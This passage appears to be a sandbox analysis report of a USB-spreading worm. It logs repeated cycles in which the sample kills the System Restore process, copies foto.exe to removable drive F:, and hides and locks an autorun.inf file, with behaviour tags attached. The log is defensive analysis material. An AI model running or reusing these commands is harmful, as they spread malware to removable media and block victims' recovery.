    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1352
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2600
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:560
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:588
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:844
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\xcopy.exe
